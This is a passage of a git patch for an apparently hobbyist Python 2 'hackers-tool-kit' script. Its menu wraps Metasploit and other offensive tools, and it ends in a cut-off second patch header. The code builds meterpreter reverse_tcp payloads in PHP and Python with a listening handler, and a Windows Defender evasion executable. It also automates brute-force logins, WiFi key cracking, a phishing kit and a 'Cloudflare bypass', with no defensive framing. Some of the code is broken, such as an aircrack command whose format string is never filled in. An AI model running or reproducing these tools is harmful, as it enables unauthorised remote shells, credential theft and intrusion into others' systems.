sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#PYLOAD START# -#------------# -def pyload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> pyload.rc') - os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') - os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) - os.system('echo "exploit\n" >> pyload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r pyload.rc') - os.system('rm -rf pyload.rc') - if yn == "n": - os.system('echo " "') -#----------# -#PYLOAD END# - - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - if x == "pyload": - pyload() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 240bcca97f6e86590539970054bbda15426af815 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 27 May 2019 04:00:17 +0100 Subject: [PATCH 149/214] Add files via upload --- htk.py | 2942 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2942 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..c101f73 --- /dev/null +++ b/htk.py @@ -0,0 +1,2942 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting 